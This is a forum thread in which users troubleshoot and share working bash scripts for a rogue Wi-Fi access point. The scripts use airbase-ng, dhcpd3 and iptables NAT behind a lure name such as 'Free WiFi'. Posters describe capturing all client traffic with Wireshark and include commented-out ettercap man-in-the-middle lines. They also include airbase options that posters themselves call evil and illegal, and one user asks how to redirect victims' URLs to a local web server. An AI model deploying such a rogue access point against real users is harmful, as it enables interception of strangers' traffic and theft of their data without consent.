Printable View
Crap pastebin is down and I don't have the script XD yeah i know.. backup well I didnt :P .. Working on my Jasager on Fonera+ and successfully got ettercap installed on it. But I forgot how the heck I got ettercap working the way I want it to.
Would anyone mind providing me with the script if they have it somewhere? :)
edit: It's back up again, phew ...
As a lot of you know Badkarma has written a wicket rouge AP with Karma functionality that uses ettercap for packet capture and manipulation. It is not only vary well written but made for BT4. Seems all his apps are for BT4 now...
http://www.darkoperator.com/tools-and-scripts/
The P C 60 seem to work fine etc. I have tried more or less every softAP out there, but they all seem to suffer from one detail. They are slow. I am not to sure if fragmentation is the whole story. Has ANYBODY had a rougeAP working that runs really well? If so what wifi card/s are you using?
onryo
I can't get the internet access on the rogue AP to work at all. I have modded the script slightly to make it work with dhcpd3 on BT4. I'm using BT4 in VMWare with Alfa USB and wired ethernet. Also modded it so it does not use the -p -c flags to interfere with other clients or AP's, and also removed ettercap for now while I try to get it to work.
The client gets through the full DHCP cycle, discover, offer, request, ack. Clients gets an IP. I can see in Wireshark that the doman names are resolving successfully, but no internet access. Tried using MTU 1500 and 1400. Also checked I have internet access in BT4 by doing wget. Here's the modded script:
Any ideas?Code:##!/bin/bash
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcp3-server/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
modprobe tun
konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
#konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &
sleep 10
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
#konsole -e ettercap -T -q -p -i at0 // // &
sleep 8
same problem here, i can connect to my access point, but not to the internet. i have used your modified code.
(p.s. does anybody know how to rewrite it, to forward all urls to an apache webserver running on the the same machine like the access point?)
same here :S waiting for solution ... searching to solve this ..
This worked perfectly. Thanks! Very well explained. cudos
I've finally got this working after a long while. My setup is as follows:
Vista laptop running BT4-Beta in VMWare Player
Internet source is a wireless connection using the on board laptop wifi card, to my Netgear DG834GT router.
Using the Alfa USB wifi adapter for creating the AP.
Below is the script which I have modified to get it to work with BT4-Beta. I haven't tried it in BT4 PreFinal.
Note: The script is also modified so that it will not use the -P and -C options of airbase (the ones which interfere with other clients aka illegal). If you want that on then uncomment and comment the relevant lines.
I also have the ettercap section of the script commented out because I found that BT lagged too much or crashed, you can try it though, just uncomment the line.
Also: I have modified the script so that it does not ask for the wireless and Internet source interfaces - I got sick of typing wlan0 and eth0 everytime I ran the script. It only asks for the AP SSID, the two interfaces are hard coded as wlan0 for the Alfa, and eth0 for the Internet source (even though my Internet source is wireless not ethernet).
This is running very fast from the client's point of view, I can surf online and I can't tell the difference between using the rogue AP or connecting directly to the router. I have only tried this using an iPhone as the client so far. I can also open up Wireshark and listen on the at0 interface to capture all the traffic passed through the rogue AP.
Be sure to turn networking on in BT before running the script - otherwise BT will not have an Internet connection to route for the clients. I do this by:
Then I do a quick test using wget to verify that my internet connection is available to BT.:Code:/etc/init.d/networking start
Code:wget google.com
Modified script for BT4-Beta:
Hope this helps those that couldn't get this working in BT4. Thanks to the original author for this interesting experiment.Code:#!/bin/bash
# The iface inputs are commented out and hard coded, to save having to type them everytime the script is executed
#echo -n "Enter the name of the interface connected to the internet, for example eth0: "
#read -e IFACE
#echo -n "Enter your wireless interface name, for example wlan0: "
#read -e WIFACE
# here I have hard coded the two interfaces, change them if yours are different
IFACE=eth0
WIFACE=wlan0
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
modprobe tun
# Below is the safe airbase command which does not use the evil options
konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
# The line below is commented out, it uses the evil options -P and -C
#konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &
sleep 10
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
# Below ettercap is commented out, just remove the # if you want it on
#konsole -e ettercap -T -q -p -i at0 // // &
sleep 8
echo "1" > /proc/sys/net/ipv4/ip_forward